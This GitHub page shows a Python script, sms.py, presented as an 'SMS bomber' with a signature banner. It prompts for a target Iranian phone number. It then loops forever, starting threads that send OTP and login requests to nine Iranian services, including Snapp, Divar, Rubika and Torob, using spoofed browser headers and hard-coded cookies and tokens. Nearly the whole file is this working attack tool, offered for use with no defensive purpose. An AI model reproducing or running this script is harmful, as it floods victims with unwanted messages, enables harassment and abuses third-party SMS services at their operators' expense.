-
Notifications
You must be signed in to change notification settings - Fork 26
/
Copy pathsms.py
201 lines (182 loc) · 11.9 KB
/
sms.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
#python script; running on python3 and linux and windows
# imports ----------------------
from os import system
# try !
try:
import requests
except:
system('pip install requests')
try:
import threading
except:
system('pip install threading')
try:
import colored
except:
system('pip install colored')
try:
from datetime import datetime
except:
system('pip install datetime')
# !
import time
import requests
import sys
from threading import Thread
from time import sleep
from colored import fg, bg, attr
#-----
# proxy ----
proxy = {"https": "127.0.0.1.8000"}
#--------
try:
system('clear')
except:
system('cls')
green="\033[32m"
red ="\033[31m"
blue="\033[36m"
pink="\033[35m"
yellow="\033[93m"
darkblue="\033[34m"
white="\033[00m"
print(f"{blue}\n\n\n\n\nsMs bOmBeR God\n")
sleep(2)
try:
tm = requests.get("https://api.codebazan.ir/time-date/?td=all").text
except:
tm = (datetime.today())
s = f"""{white}|POWER BOMBER|\n\n
{yellow}\n⟨⟨⟨ {darkblue}date: {blue}[[ {tm} ]] {yellow}⟩⟩⟩
{pink}
____ __ __ ____ ___ _ _
| _ \ \ \ / / / ___| / _ \ | \ | |
| |_) | \ V / \___ \ | | | | | \| |
| _ < | | ___) | | |_| | | |\ |
|_| \_\ |_| |____/ \___/ |_| \_|
{green}
|t.me/creator_ryson|t.me/uupdatte |
|rubika.ir/caetorr |creator-rayson.blogfa.com|\n\n
{yellow}<SMS SENDER> ~ [M.D RYSON] FROM [ASHIANEH]\n\n
"""
for t in s:
sys.stdout.write(t)
sys.stdout.flush()
time.sleep(0.01)
def snap(phone):
#snap api
snapH = {"Host": "app.snapp.taxi", "content-length": "29", "x-app-name": "passenger-pwa", "x-app-version": "5.0.0", "app-version": "pwa", "user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36", "content-type": "application/json", "accept": "*/*", "origin": "https://app.snapp.taxi", "sec-fetch-site": "same-origin", "sec-fetch-mode": "cors", "sec-fetch-dest": "empty", "referer": "https://app.snapp.taxi/login/?redirect_to\u003d%2F", "accept-encoding": "gzip, deflate, br", "accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6", "cookie": "_gat\u003d1"}
snapD = {"cellphone":phone}
try:
snapR = requests.post("https://app.snapp.taxi/api/api-passenger-oauth/v2/otp", headers=snapH, json=snapD)
if "OK" in snapR.text:
print (F"{blue}[+]snap SEND")
else:
print (F"{red}[!]not FOUND")
except:
print (f"{red}not send")
def shad(phone):
#shad api
shadH = {"Host": "shadmessenger12.iranlms.ir","content-length": "96","accept": "application/json, text/plain, */*","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","content-type": "text/plain","origin": "https://shadweb.iranlms.ir","sec-fetch-site": "same-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://shadweb.iranlms.ir/","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
shadD = {"api_version":"3","method":"sendCode","data":{"phone_number":phone.split("+")[1],"send_type":"SMS"}}
try:
shadR = requests.post("https://shadmessenger12.iranlms.ir/", headers=shadH, json=shadD)
if "OK" in shadR.text:
print (F"{green}shad Send")
else:
print (f"{red}not the found")
except:
print (f"{red}is not attack")
def gap(phone):
#gap api
gapH = {"Host": "core.gap.im","accept": "application/json, text/plain, */*","x-version": "4.5.7","accept-language": "fa","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","appversion": "web","origin": "https://web.gap.im","sec-fetch-site": "same-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://web.gap.im/","accept-encoding": "gzip, deflate, br"}
try:
gapR = requests.get("https://core.gap.im/v1/user/add.json?mobile=%2B{}".format(phone.split("+")[1]), headers=gapH)
if "OK" in gapR.text:
print ("\n%s%s!-attacked-!%s" % (fg('green'), bg('white'), attr('reset')))
else:
print (f"{red}not found target-!")
except:
print (f"{red}no attack-!")
def tap30(phone):
#tap30 api
tap30H = {"Host": "tap33.me","Connection": "keep-alive","Content-Length": "63","User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","content-type": "application/json","Accept": "*/*","Origin": "https://app.tapsi.cab","Sec-Fetch-Site": "cross-site","Sec-Fetch-Mode": "cors","Sec-Fetch-Dest": "empty","Referer": "https://app.tapsi.cab/","Accept-Encoding": "gzip, deflate, br","Accept-Language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
tap30D = {"credential":{"phoneNumber":"0"+phone.split("+98")[1],"role":"PASSENGER"}}
try:
tap30R = requests.post("https://tap33.me/api/v2/user", headers=tap30H, json=tap30D)
if "OK" in tap30R.text:
print ("\n%s%s!-attacked-!%s" % (fg('green'), bg('white'), attr('reset')))
else:
print (f"{red}not found target-!\n")
except:
print (f"{red}no attack-!\n")
def emtiaz(phone):
#emtiaz api
emH = {"Host": "web.emtiyaz.app","Connection": "keep-alive","Content-Length": "28","Cache-Control": "max-age\u003d0","Upgrade-Insecure-Requests": "1","Origin": "https://web.emtiyaz.app","Content-Type": "application/x-www-form-urlencoded","User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","Accept": "text/html,application/xhtml+xml,application/xml;q\u003d0.9,image/webp,image/apng,*/*;q\u003d0.8,application/signed-exchange;v\u003db3;q\u003d0.9","Sec-Fetch-Site": "same-origin","Sec-Fetch-Mode": "navigate","Sec-Fetch-User": "?1","Sec-Fetch-Dest": "document","Referer": "https://web.emtiyaz.app/login","Accept-Encoding": "gzip, deflate, br","Accept-Language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6","Cookie": "__cfduid\u003dd3744e2448268f90a1ea5a4016884f7331596404726; __auc\u003dd86ede5a173b122fb752f98d012; _ga\u003dGA1.2.719537155.1596404727; __asc\u003d7857da15173c7c2e3123fd4c586; _gid\u003dGA1.2.941061447.1596784306; _gat_gtag_UA_124185794_1\u003d1"}
emD = "send=1&cellphone=0"+phone.split("+98")[1]
try:
emR = requests.post("https://web.emtiyaz.app/json/login", headers=emH, data=emD)
print ("\n%s%s!-attacked-!%s" % (fg('green'), bg('white'), attr('reset')))
except:
print (f"{red}no attack-!\n")
def divar(phone):
#divar api
divarH = {"Host": "api.divar.ir","Connection": "keep-alive","Content-Length": "22","Accept": "application/json, text/plain, */*","User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","Content-Type": "application/x-www-form-urlencoded","Origin": "https://divar.ir","Sec-Fetch-Site": "same-site","Sec-Fetch-Mode": "cors","Sec-Fetch-Dest": "empty","Referer": "https://divar.ir/my-divar/my-posts","Accept-Encoding": "gzip, deflate, br","Accept-Language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
divarD = {"phone":phone.split("+98")[1]}
try:
divarR = requests.post("https://api.divar.ir/v5/auth/authenticate", headers=divarH, json=divarD)
if "SENT" in divarR.text:
print ("\n%s%s!-attacked-!%s" % (fg('green'), bg('white'), attr('reset')))
else:
print (f"{red}not found target-!")
except:
print (f"{red}no attack-!")
def rubika(phone):
#rubika api
ruH = {"Host": "messengerg2c4.iranlms.ir","content-length": "96","accept": "application/json, text/plain, */*","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","content-type": "text/plain","origin": "https://web.rubika.ir","sec-fetch-site": "cross-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://web.rubika.ir/","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
ruD = {"api_version":"3","method":"sendCode","data":{"phone_number":phone.split("+")[1],"send_type":"SMS"}}
try:
ruR = requests.post("https://messengerg2c4.iranlms.ir/", headers=ruH, json=ruD)
if "OK" in ruR.text:
print ("\n%s%s!-attacked-!%s" % (fg('green'), bg('white'), attr('reset')))
else:
print (f"{red}not found target-!\n")
except:
print (f"{red}no attack-!\n")
def torob(phone):
#torob api
torobH = {"Host": "api.torob.com","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","accept": "*/*","origin": "https://torob.com","sec-fetch-site": "same-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://torob.com/user/","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6","cookie": "amplitude_id_95d1eb61107c6d4a0a5c555e4ee4bfbbtorob.com\u003deyJkZXZpY2VJZCI6ImFiOGNiOTUyLTk1MTgtNDhhNS1iNmRjLTkwZjgxZTFjYmM3ZVIiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU5Njg2OTI4ODM1MSwibGFzdEV2ZW50VGltZSI6MTU5Njg2OTI4ODM3NCwiZXZlbnRJZCI6MSwiaWRlbnRpZnlJZCI6Miwic2VxdWVuY2VOdW1iZXIiOjN9"}
try:
torobR = requests.get("https://api.torob.com/a/phone/send-pin/?phone_number=0"+phone.split("+98")[1], headers=torobH)
if "sent" in torobR.text:
print ("\n%s%s!-attacked-!%s" % (fg('green'), bg('white'), attr('reset')))
else:
print (f"{red}not found target-!\n")
except:
print (f"{red}no attack-!\n")
def bama(phone):
#bama api
bamaH = {"Host": "bama.ir","content-length": "22","accept": "application/json, text/javascript, */*; q\u003d0.01","x-requested-with": "XMLHttpRequest","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","csrf-token-bama-header": "CfDJ8N00ikLDmFVBoTe5ae5U4a2G6aNtBFk_sA0DBuQq8RmtGVSLQEq3CXeJmb0ervkK5xY2355oMxH2UDv5oU05FCu56FVkLdgE6RbDs1ojMo90XlbiGYT9XaIKz7YkZg-8vJSuc7f3PR3VKjvuu1fEIOE","content-type": "application/x-www-form-urlencoded; charset\u003dUTF-8","origin": "https://bama.ir","sec-fetch-site": "same-origin","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://bama.ir/Signin?ReturnUrl\u003d%2Fprofile","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6","cookie": "CSRF-TOKEN-BAMA-COOKIE\u003dCfDJ8N00ikLDmFVBoTe5ae5U4a1o5aOrFp-FIHLs7P3VvLI7yo6xSdyY3sJ5GByfUKfTPuEgfioiGxRQo4G4JzBin1ky5-fvZ1uKkrb_IyaPXs1d0bloIEVe1VahdjTQNJpXQvFyt0tlZnSAZFs4eF3agKg"}
bamaD = "cellNumber=0"+phone.split("+98")[1]
try:
bamaR = requests.post("https://bama.ir/signin-checkforcellnumber", headers=bamaH, data=bamaD)
if "0" in bamaR.text:
print ("\n%s%s!-attacked-!%s" % (fg('green'), bg('white'), attr('reset')))
else:
print (f"{red}not found target-!\n")
except:
print (f"{red}no attack-!\n")
try:
phone = str(input(f"{blue}Number Target {darkblue}(+98XXXXXXXXXX) {green}⟩⟩> {white}"))
while True:
Thread(target=snap, args=[phone]).start()
Thread(target=shad, args=[phone]).start()
Thread(target=gap, args=[phone]).start()
Thread(target=tap30, args=[phone]).start()
Thread(target=emtiaz, args=[phone]).start()
Thread(target=divar, args=[phone]).start()
Thread(target=rubika, args=[phone]).start()
Thread(target=torob, args=[phone]).start()
Thread(target=bama, args=[phone]).start()
except:
print()